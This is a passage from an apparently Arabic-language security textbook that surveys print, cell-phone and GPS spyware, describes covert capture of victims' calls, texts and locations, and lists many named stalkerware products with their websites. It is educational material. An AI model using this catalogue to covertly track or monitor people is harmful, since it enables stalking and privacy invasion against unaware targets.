‫‪MyWebcam Broadcaster available at http://www.eyespyfx.com‬‬
‫‪Digi-Watcher available at http://www.digi-watcher.com‬‬
‫‪NET Video Spy available at http://www.sarbash.com‬‬
‫‪Eyeline Video Surveillance Software available at http://www.nchsoftware.com‬‬
‫‪Capturix VideoSpy available at http://www.capturix.com‬‬
‫‪WebCam Looker available at http://felenasoft.com‬‬
‫‪SecuritySpy available at http://www.bensoftware.com‬‬
‫‪iSpy available at http://www.ispyconnect.com‬‬
‫‪Print Spyware‬‬

‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن ﻣن ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ ﻟﻠﻣﻧظﻣﺔ اﻟﮭدف ﻋن ﺑﻌد ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ‪ .‬ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ ھﻲ ﺑرﻣﺟﯾﺎت‬
‫ﻟرﺻد اﺳﺗﺧدام اﻟطﺎﺑﻌﺎت ﻓﻲ اﻟﻣؤﺳﺳﺔ‪ .‬ﯾوﻓر ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺎﺑﻌﺎت ﻣﻌﻠوﻣﺎت دﻗﯾﻘﺔ ﻋن أﻧﺷطﺔ اﻟطﺑﺎﻋﺔ ﻟﻠطﺎﺑﻌﺎت ﻓﻲ اﻟﻣﻛﺗب أو اﻟطﺎﺑﻌﺎت‬
‫اﻟﻣﺣﻠﯾﺔ‪ ،‬ﻣﻣﺎ ﯾﺳﺎﻋد ﻓﻲ ﺗﺣﺳﯾن اﻟطﺑﺎﻋﺔ‪ ،‬وﺗوﻓﯾر اﻟﺗﻛﺎﻟﯾف‪ ،‬اﻟﺦ‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺗﻌﻠﻘﺔ ﺑﺄﻧﺷطﺔ اﻟطﺎﺑﻌﺔ وﺣﻔظ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ‬
‫ﺳﺟﻼت ﻣﺷﻔرة وإرﺳﺎل ﻣﻠف اﻟﺳﺟل ﻟﻌﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد ﻋﺑر اﻹﻧﺗرﻧت‪ .‬وﯾﺗﻛون اﻟﺗﻘرﯾر اﻟﺳﺟل ﺑﺎﻟﺿﺑط ﻣن ﻣﮭﻣﺔ اﻟطﺑﺎﻋﺔ ﻣﺛل‬
‫ﻋدد اﻟﺻﻔﺣﺎت اﻟﻣطﺑوﻋﺔ‪ ،‬ﻋدد اﻟﻧﺳﺦ‪ ،‬واﻟﻣﺣﺗوى اﻟﻣطﺑوع‪ ،‬واﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺳﺗﻐرق ﻟﻠﻘﯾﺎم ﺑﺎﻟطﺑﺎﻋﺔ‪.‬‬

‫ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ ﺗﻘوم ﺑﺗﺳﺟﯾل ﺗﻘﺎرﯾر ﺳﺟل ﻓﻲ أﺷﻛﺎل ﻣﺧﺗﻠﻔﺔ ﻷﻏراض ﻣﺧﺗﻠﻔﺔ ﻣﺛل ﻋﻠﻰ ﺷﻛل ‪ web format‬ﻹرﺳﺎل اﻟﺗﻘﺎرﯾر إﻟﻰ‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أو اﻹﻧﺗرﻧت او ﻋﻠﻰ ﺷﻛل ﻣﺷﻔرة وﻣﺧﺑﺄة ﻟﻠﺗﺧزﯾن ﻋﻠﻰ اﻟﻘرص اﻟﻣﺣﻠﻲ‪.‬‬

‫ﺗﻘﺎرﯾر اﻟﺳﺟل اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﺳوف ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ﺗﺣﻠﯾل أﻧﺷطﺔ اﻟطﺎﺑﻌﺔ‪ .‬وﯾﺑﯾن اﻟﺗﻘرﯾر ﻛﯾﻔﯾﺔ ﺗﺳﺟﯾل اﻟﻌدﯾد ﻣن اﻟوﺛﺎﺋﻖ وطﺑﺎﻋﺗﮭﺎ ﻣن‬
‫ﻗﺑل ﻛل ﻣوظف أو ﻣﺣطﺔ ﻋﻣل‪ ،‬ﺑﺟﺎﻧب اﻟﻔﺗرة اﻟزﻣﻧﯾﺔ‪ .‬ھذا ﯾﺳﺎﻋد ﻓﻲ رﺻد اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ وﯾﺣدد أي ﻣن اﻟﻣوظﻔﯾن ﯾﺳﺗﺧدﻣوا اﻟطﺎﺑﻌﺔ‪ .‬ھذا‬
‫اﻟﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ أﯾﺿﺎ ﻓﻲ اﻟﺣد ﻣن اﻟوﺻول إﻟﻰ اﻟطﺎﺑﻌﺔ‪ .‬ﺗﻘﺎرﯾر اﻟﺳﺟل ھذه ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺗﻌﻘب اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟوﺛﺎﺋﻖ ﺣﺳﺎﺳﺔ‬
‫واﻟﺳرﯾﺔ اﻟﺗﻲ ﺗم طﺑﺎﻋﺗﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪425‬‬

‫‪Print Spyware: Printer Activity Monitor‬‬


‫اﻟﻣﺻدر‪http://www.redline-software.com :‬‬
‫‪ Printer Activity Monitor‬ھﻲ واﺣدة ﻣن ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم ﻟﻣراﻗﺑﺔ اﺳﺗﺧدام‬
‫اﻟطﺎﺑﻌﺔ ﻟﻠﻣﻧظﻣﺔ اﻟﮭدف ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول اﻟﻣﺳﺗﻧدات اﻟﻣطﺑوﻋﺔ‪ .‬ﯾﺳﻣﺢ ھذا اﻟﺗطﺑﯾﻖ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟرﺻد وﺗدﻗﯾﻖ اﻟطﺎﺑﻌﺎت ﺑﺣﯾث اﻧﮫ‬
‫ﯾﻣﻛن ﻣﻌرﻓﺔ اﻟوﺛﺎﺋﻖ اﻟﺗﻲ ﺗطﺑﻊ ﻋﻠﻰ ﻛل ﻣن اﻟطﺎﺑﻌﺎت اﻟﻣﺧﺗﺎرة‪ ،‬ﻋدد اﻟﺻﻔﺣﺎت اﻟﻣطﺑوﻋﺔ‪ ،‬اﻟﺦ‪.‬‬
‫ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﺗﻔﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن ‪:Printer Activity Monitor‬‬
‫‪ .1‬ﺗﺗﺑﻊ ﺑدﻗﺔ ﻣﮭﺎم اﻟطﺑﺎﻋﺔ‪.‬‬
‫‪ .2‬رﺻد أﻋداد ﻛﺑﯾرة ﻣن اﻟطﺎﺑﻌﺎت ﻓﻲ وﻗت واﺣد‪.‬‬
‫‪ .3‬ﻣراﻗﺑﺔ اﻟطﺎﺑﻌﺎت ﻋن ﺑﻌد‪.‬‬
‫‪ .4‬إﻧﺷﺎء ﺗﻘﺎرﯾر ﺣول اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ‪.‬‬

‫‪Print Spyware: other tools‬‬


‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﻣﻛﻧﮭم أﯾﺿﺎ اﺳﺗﺧدام اﻟﺗطﺑﯾﻘﺎت اﻟﺗﺎﻟﯾﺔ ﻟرﺻد اﻟطﺎﺑﻌﺔ ﻛﺑراﻣﺞ ﺗﺟﺳس اﻟطﺎﺑﻌﺔ ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ‬
‫اﻟﮭدف‪ .‬ھذا اﻟﺗطﺑﯾﻘﺎت ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻟﺗﺗﺑﻊ اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ ﻣﺛل ﻣﺣﺗوى اﻟوﺛﺎﺋﻖ اﻟﻣطﺑوﻋﺔ‪ ،‬وﻧﺳﺦ اﻟرﻗم اﻟﻣطﺑوع وﺗﺎرﯾﺦ واﻟوﻗت اﻟذي‬
‫اﺳﺗﻐرﻗﺗﮫ اﻟطﺑﺎﻋﺔ‪ ،‬وھﻠم ﺟرا‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟطﺑﺎﻋﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Print Monitor Pro available at http://www.spyarsenal.com‬‬
‫‪Accurate Printer Monitor available at http://www.aggsoft.com‬‬
‫‪Print Censor Professional available at http://usefulsoft.com‬‬
‫‪All-Spy Print available at http://www.all-spy.com‬‬
‫‪O&K Print Watch available at http://www.prnwatch.com‬‬
‫‪Print Job Monitor available at http://www.imonitorsoft.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪426‬‬

‫‪PrintTrak available at http://www.lygil.com‬‬


‫‪Printer Admin - Copier Tracking System available at http://www.printeradmin.com‬‬
‫‪Print Inspector available at http://www.softperfect.com‬‬
‫‪Print365 available at http://krawasoft.com‬‬
‫‪Telephone/Cell Phone Spyware‬‬

‫ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي ھو أداة ﺑرﻣﺟﯾﺎت اﻟﺗﻲ ﺗﻣﻧﺣك اﻟوﺻول اﻟﻛﺎﻣل وﻣراﻗﺑﺔ ھﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي اﻟﺿﺣﯾﺔ‪ .‬ﺣﯾث اﻧﮫ‬
‫ﯾﻘوم ﺑﺈﺧﻔﺎء ﻧﻔﺳﮫ ﺗﻣﺎﻣﺎ ﻋن ﻣﺳﺗﺧدم اﻟﮭﺎﺗف‪ .‬ﺗﻘوم ھذه اﻟﺗطﺑﯾﻘﺎت ﺑﺗﺳﺟﯾل و‪ log‬ﻛل ﻧﺷﺎط ﻋﻠﻰ اﻟﮭﺎﺗف ﻣﺛل اﺳﺗﺧدام اﻻﻧﺗرﻧت واﻟرﺳﺎﺋل‬
‫اﻟﻧﺻﯾﺔ‪ ،‬واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ .‬ﺛم ﯾﻣﻛﻧك اﻟوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻋن طرﯾﻖ اﻟﻣوﻗﻊ اﻹﻟﻛﺗروﻧﻲ ﻟﻠﺑرﻧﺎﻣﺞ اﻟرﺋﯾﺳﻲ أو ﯾﻣﻛﻧك أﯾﺿﺎ‬
‫اﻟﺣﺻول ﻋﻠﻰ ھذه اﻟﻣﻌﻠوﻣﺎت ﻣن ﺧﻼل ﺗﺗﺑﻊ اﻟرﺳﺎﺋل اﻟﻘﺻﯾرة أو اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬ﻋﺎدة‪ ،‬ﯾﺗم اﺳﺗﺧدام ھذه اﻟﺗطﺑﯾﻘﺎت ﻟرﺻد وﺗﺗﺑﻊ اﺳﺗﺧدام‬
‫اﻟﮭﺎﺗف ﻣن ﻗﺑل اﻟﻣوظﻔﯾن‪ .‬وﻟﻛن اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣون ھذا اﻟﺗطﺑﯾﻘﺎت ﻟﺗﻌﻘب اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي ﻟﻸﺷﺧﺎص‬
‫اﻟﻣﺳﺗﮭدﻓﯾن أو اﻟﻣﻧظﻣﺎت‪ .‬اﺳﺗﺧدام ھذا اﻟﺗطﺑﯾﻘﺎت ﻻ ﯾﺗطﻠب أي اﻣﺗﯾﺎزات ﻟدﯾﮭﺎ‪.‬‬

‫ﺗﺷﻣل ﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي اﻟﻣﯾزات اﻷﻛﺛر ﺷﯾوﻋﺎ‪:‬‬


‫‪ - Call History‬ﺣﯾث ﯾﻣﻛﻧك أن ﺗرى ﺳﺟل اﻟﮭﺎﺗف )‪ (call history‬ﻛﻠﮫ )ﺳواء اﻟﻣﻛﺎﻟﻣﺎت اﻟﺻﺎدرة واردة(‪.‬‬
‫‪ - View Text Messages‬ﺗﻣﻛﻧك ﻣن ﻣﺷﺎھدة ﺟﻣﯾﻊ اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ اﻟواردة واﻟﺻﺎدرة‪ .‬ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟرﺳﺎﺋل ﺣﺗﻰ اﻟﺗﻲ ﺣذف‬
‫ﯾﻣﻛن رؤﯾﺗﮭﺎ وﺗﺳﺟﯾﻠﮭﺎ ﻓﻲ ﻣﻠف اﻟﺳﺟل‪.‬‬
‫‪ - Web Site History‬ﺳﺟل ﻛﺎﻣل ﻟﺟﻣﯾﻊ اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﺧﻼل اﻟﮭﺎﺗف وﺳوف ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ إﻟﻰ ﻣﻠف ﺗﻘرﯾر ﺳﺟل‪.‬‬
‫‪ - GPS Tracking‬ﺳوف ﺗظﮭر ﻟك ﺑراﻣﺞ اﻟﺗﺟﺳس ﺣﯾث ﯾﻛون اﻟﮭﺎﺗف ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ .‬ھﻧﺎك أﯾﺿﺎ ﺳﺟل ﻋن ﻣوﻗﻊ اﻟﮭﺎﺗف اﻟﺧﻠﯾوي‬
‫ﺣﺗﻰ ﺗﺳﺗطﯾﻊ أن ﺗرى اﻟﻣﻛﺎن اﻟذي ﯾوﺟد ﻓﯾﮫ اﻟﮭﺎﺗف‪.‬‬
‫ھذه اﻟﺗطﺑﯾﻘﺎت ﺗﻌﻣل ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ‪:‬‬

‫‪Cellphone Spyware: Mobile Spy‬‬


‫اﻟﻣﺻدر‪http://www.phonespysoftware.com :‬‬
‫‪ Mobile Spy‬ھﻲ ﺑراﻣﺞ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻣﺣﻣول واﻟﺗﻲ ﺗﺳﺎﻋدك ﻋﻠﻰ رﺻد وﺗﺳﺟﯾل أﻧﺷطﺔ اﻟﮭﺎﺗف اﻟﻣﺣﻣول اﻟﻣﺳﺗﮭدف‪ .‬ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت‬
‫ھذا اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ اﻟﮭﺎﺗف اﻟﻣﺣﻣول‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذا اﻟﺑرﻧﺎﻣﺞ‪ ،‬ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻷﻧﺷطﺔ‪ ،‬وﺳﺟﻼت‪ ،‬وﻣواﻗﻊ ‪ GPS‬ﻣن اﻟﮭدف‪ .‬ﻟﻌرض‬
‫اﻟﻧﺗﺎﺋﺞ‪ ،‬ﺑﻛل ﺑﺑﺳﺎطﺔ ﺳوف ﺗﺣﺗﺎج ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺣﺳﺎب آﻣن ﺑﺎﺳﺗﺧدام أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر أو ﻣﺗﺻﻔﺢ وﯾب ﻟﻠﺟوال‪ .‬ﯾﺗم ﻋرض ﺳﺟﻼت‬
‫ﺣﺳب اﻟﻔﺋﺎت وﻓرزھﺎ ﻟﺳﮭوﻟﺔ اﻟﺗﺻﻔﺢ‪.‬‬
‫ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ‪ ،‬وﻣراﻗﺑﺔ وﺳﺎﺋل اﻻﻋﻼم اﻻﺟﺗﻣﺎﻋﯾﺔ‪ ،‬ورﺻد اﻟﻣواﻗﻊ‪ ،‬وﺗﺗﺑﻊ ﻧظﺎم ﺗﺣدﯾد اﻟﻣواﻗﻊ وﺗﺳﺟﯾل اﻟﺻور‬
‫واﻟﻔﯾدﯾوھﺎت اﻟﺗﻲ ﺳﺟﻠت‪ ،‬ﻣﺷﺎھدة ﺣﯾﺔ ﻟﻠوﺣﺔ اﻟﺗﺣﻛم وﺗﻔﺎﺻﯾل اﻟﻣﻛﺎﻟﻣﺔ‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪427‬‬

‫‪Telephone/Cell Phone Spyware: other tools‬‬


‫ﻣﺛل ‪ ،Mobile Spy‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم أﯾﺿﺎ اﺳﺗﺧدام اﻟﺑراﻣﺞ اﻟﺗﺎﻟﯾﺔ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪ /‬اﻟﮭﺎﺗف اﻟﺧﻠوي ﻟﺗﺳﺟﯾل ﻛل ﻧﺷﺎط ﻋﻠﻰ اﻟﮭﺎﺗف‬
‫ﻣﺛل اﺳﺗﺧدام اﻹﻧﺗرﻧت واﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي‬
‫اﻟﻣﺗوﻓرة‪:‬‬
‫‪VRS Recording System available at http://www.nch.com.au‬‬
‫‪Modern Spy available at http://www.modemspy.com‬‬
‫‪Mobistealth Cell Phone Spy available at http://www.mobistealth.com‬‬
‫‪SPYPhone GOLD available at http://spyera.com‬‬
‫‪SpyPhoneTap available at http://www.spyphonetap.com‬‬
‫‪FlexiSPY OMNI available at http://www.flexispy.com‬‬
‫‪SpyBubble available at http://www.spybubble.com‬‬
‫‪MOBILE SPY available at http://www.mobile-spy.com‬‬
‫‪StealthGenie available at http://www.stealthgenie.com‬‬
‫‪GPS Spyware‬‬
‫‪ GPS spyware‬ھو ﺟﮭﺎز أو ﺗطﺑﯾﻖ ﺑرﻣﺟﯾﺎت واﻟﺗﻲ ﺗﺳﺗﺧدم ﻧظﺎم ﺗﺣدﯾد اﻟﻣواﻗﻊ اﻟﻌﺎﻟﻣﻲ )‪ (GPS‬ﻟﺗﺣدﯾد ﻣوﻗﻊ اﻟﺳﯾﺎرة أو ﺷﺧص أو‬
‫اﻷﺻول اﻷﺧرى اﻟﻣﺗﺻﻠﺔ ﺑﮭﺎ أو اﻟﻣﺛﺑت ﻋﻠﯾﮭﺎ‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ھذه اﻟﺑراﻣﺞ ﻟﺗﻌﻘب اﻟﺷﺧص اﻟﮭدف‪ .‬ﺑراﻣﺞ اﻟﺗﺟﺳس ھذه ﺗﺳﻣﺢ ﻟك‬
‫ﺗﺗﺑﻊ ﻧﻘﺎط ﻣﻛﺎن اﻟﮭﺎﺗف وﺣﻔظ أو ﺗﺧزﯾن ھذا ﻓﻲ ﻣﻠف ﺳﺟل وارﺳﺎﻟﮭﺎ إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد‪ .‬ﺛم ﯾﻣﻛﻧك ﻣﺷﺎھدة ﻣوﻗﻊ اﻟﻣﺳﺗﺧدم‬
‫اﻟﮭدف ﻋن طرﯾﻖ اﻟدﺧول اﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد وﻋرض أﺛر اﻟﻧﻘطﺔ اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﮭدف واﻟﺗﻲ ﺗﻌﺑر ﻋن ﻣﻛﺎن اﻟﮭﺎﺗف ﻋﻠﻰ‬
‫اﻟﺧرﯾطﺔ‪ .‬ﯾرﺳل أﯾﺿﺎ إﺧطﺎرات اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﺗﻧﺑﯾﮭﺎت ﻋن ﻗرب اﻟﻣوﻗﻊ‪ .‬اﻟﻣﮭﺎﺟم ﯾﺗﺗﺑﻊ ﻣوﻗﻊ اﻟﺷﺧص اﻟﻣﺳﺗﮭدف ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ‬
‫ﺗﺟﺳس ﺗﺣدﯾد اﻟﻣواﻗﻊ ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪428‬‬

‫‪GPS Spyware: SPYPhone‬‬


‫اﻟﻣﺻدر‪http://spyera.com :‬‬
‫‪ SPYPhone‬ھو ﺑراﻣﺞ ﺗﺟﺳس ‪ GPS‬اﻟﺗﻲ ﺗرﺳل ﻣوﻗﻊ ‪ GPS‬ﻟﻠﮭﺎﺗف اﻟﻣﺣﻣول اﻟﻣﺳﺗﮭدف ﻟﺣﺳﺎب اﻟوﯾب اﻟﺧﺎص ﺑك ﻋن طرﯾﻖ واي‬
‫ﻓﺎي‪ ،3G ،‬ﺟﻲ ﺑﻲ آر إس أو‪ . SMS‬ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت ھذا اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ اﻟﮭﺎﺗف اﻟﻣﺣﻣول اﻟﺗﻲ ﺗرﯾد ﺗﻌﻘﺑﮫ‪ .‬ﺳوف ‪Spyera Spyphone‬‬
‫ﯾﺳﺗﺧدم ‪ GPS‬ﻟﺗﺣدﯾد اﻟﻣواﻗﻊ ﻹظﮭﺎر إﺣداﺛﯾﺎت اﻟﺟﮭﺎز وﻣوﻗﻌﮫ اﻟﻔﻌﻠﻲ ﻋﻠﻰ اﻟﺧرﯾطﺔ داﺧل ﺣﺳﺎب اﻟوﯾب اﻟﺧﺎص ﺑك‪ .‬ﺑل ﯾﻣﻛﻧﮫ ﺗﻛوﯾن‬
‫إﻋدادات ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﺗﺣدﯾﺛﺎت ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ ،‬وﻋرض ﻣﺳﺎر اﻟﺳﻔر ﺑﯾن أوﻗﺎت ﻣﻌﯾﻧﺔ‪.‬‬
‫ﯾﻣﻛﻧك ﻓﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام ھذا اﻟﺑرﻧﺎﻣﺞ‪:‬‬
‫‪ -‬اﻻﺳﺗﻣﺎع اﻟﻰ ﻣﺣﺎدﺛﺎت ﻣﻛﺎﻟﻣﺔ ھﺎﺗﻔﯾﺔ‪.‬‬
‫‪ -‬ﻗراءة اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ اﻟﻘﺎدﻣﺔ ﻣن وإﻟﻰ اﻟﮭدف اﻟﻣﺗﺣرك‪.‬‬
‫‪ -‬ﻋرض ﻣﺣﻔوظﺎت اﻟﻣﻛﺎﻟﻣﺔ ﻟﻠﮭدف اﻟﻣﺗﺣرك‪.‬‬
‫‪ -‬ﺗﺣدﯾد ﻣوﻗﻊ اﻟﮭدف‪.‬‬
‫‪ -‬ﻗواﺋم اﻻﺗﺻﺎل واﻟوﺻول إﻟﻰ اﻟﺻور اﻟﺗﻲ اﻟﺗﻘطت‪.‬‬
‫‪ -‬ﻗراءة رﺳﺎﺋل اﻟدردﺷﺔ‪.‬‬
‫‪ -‬ﻗراءة اﻟرﻗم اﻟﺧﻠﯾوي اﺳم اﻟﮭدف اﻟﻣﺣﻣول‪.‬‬

‫‪GPS Spyware: other tools‬‬


‫ھﻧﺎك ﺑراﻣﺞ ﻣﺧﺗﻠﻔﺔ واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺗﺑﻊ ﻣوﻗﻊ ﻣﻌﯾن ﻣن اﻷﺟﮭزة اﻟﻧﻘﺎﻟﺔ‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻣﻛﻧﮭم أﯾﺿﺎ اﻻﺳﺗﻔﺎدة ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ‪GPS‬‬
‫اﻟﺗﺎﻟﯾﺔ ﻟﺗﺗﺑﻊ اﻟﻣوﻗﻊ ﻣن اﻟﮭواﺗف اﻟﻧﻘﺎﻟﺔ اﻟﮭدف‪:‬‬
‫‪EasyGPS available at http://www.easygps.com‬‬
‫‪FlexiSPY PRO-X available at http://www.flexispy.com‬‬
‫‪GPS TrackMaker Professional available at http://www.trackmaker.com‬‬
‫‪MOBILE SPY available at http://www.mobile-spy.com‬‬
‫‪World-Tracker available at http://www.world-tracker.com‬‬
‫‪ALL-in-ONE Spy available at http://www.thespyphone.com‬‬
‫‪Trackstick available at http://www.trackstick.com‬‬
‫‪Mobistealth Pro available at http://www.mobistealth.com‬‬
‫‪mSpy available at http://ar.mspy.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪429‬‬

‫‪How to Defend Against Keyloggers‬‬

‫اﻟﻛﯾﻠوﺟرز ھو ﺗطﺑﯾﻖ اﻟذي ﯾﻠﺗﻘط وﯾﺳﺟل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺳرا ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻛﺎن اﻟﮭدف اﻟرﺋﯾﺳﻲ وراء ﺗطوﯾر ﺑرﻣﺟﯾﺎت ﻛﻠوﺟر اﻻﺳﺗﺧدام اﻹﯾﺟﺎﺑﻲ ﻣﺛل اﺳﺗﻌﺎدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﻔﻘودة أو ﺣذف‪ ،‬أو ﻣراﻗﺑﺔ‬
‫اﻟﻣوظﻔﯾن واﻷطﻔﺎل‪ ،‬وﺗﺷﺧﯾص ﻣﺷﺎﻛل ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻷﺧرى‪ .‬وﻣﻊ ذﻟك‪ ،‬ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟﻣون ﻷﻏراض أﺧرى ﺧﺑﯾﺛﺔ ﻣﺛل ﺳرﻗﺔ اﻟﮭوﯾﺔ‬
‫ﻣن اﻟﻣوظﻔﯾن‪ ،‬وﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر‪ ،‬واﻟﺣﺻول ﻋﻠﻰ ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وأرﻗﺎم اﻟﮭواﺗف واﻟﺣﺳﺎب اﻟﻣﺻرﻓﻲ‪ ،‬واﻟﺣﺻول ﻋﻠﻰ دﺧول ﻏﯾر‬
‫ﻣﺻرح ﺑﮫ‪ ،‬وھﻠم ﺟرا‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن أﻧﮫ ﻣن اﻟﺻﻌب اﻟﻛﺷف ﻋن وﺟود ﻛﯾﻠوﺟرز ﺣﯾث أﻧﮭﺎ ﻣﺧﻔﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﻓﮭﻧﺎك ﻋدد ﻗﻠﯾل ﻣن اﻟطرق‬
